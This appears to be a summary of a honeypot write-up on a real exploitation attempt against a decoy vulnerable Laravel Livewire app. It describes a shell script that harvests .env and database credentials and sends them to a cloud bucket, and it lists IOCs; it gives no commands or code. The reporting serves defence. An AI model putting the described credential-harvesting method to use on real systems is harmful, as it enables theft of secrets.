What My Livewire Honeypot Caught in Its First 60 Hours
2 days ago
- #honeypot
- #cybersecurity
- #exploitation
- Livewire-honeypot, a FastAPI service mimicking a vulnerable Laravel app (CVE-2025-54068), caught its first real-world exploitation attempt by an Indonesian operator using Livepyre.
- The exploitation involved a three-request pattern from source IP 140.213.220.239, downloading a shell script (shoc.sh) from xantibot[.]pw to harvest credentials and database data from compromised PHP applications.
- The script (shoc.sh) searches for config files (e.g., .env, wp-config.php), extracts database credentials and APP_KEY, and uploads findings to a DigitalOcean Spaces bucket, while sending status updates via a Telegram bot.
- No persistence or backdoor is left on compromised systems; the operation focuses on one-time data exfiltration for sale, with IOCs limited to request logs rather than disk artifacts.
- The C2 domain xantibot[.]pw has been active since at least February 2026, hosted on Alibaba Cloud Singapore, and linked to multiple victim sites, but lacks prior public threat intelligence coverage.
- Discovery latency was 60 hours, with the trap likely found via certificate transparency (CT) logs, indicating attackers use new-cert feeds for target discovery within days.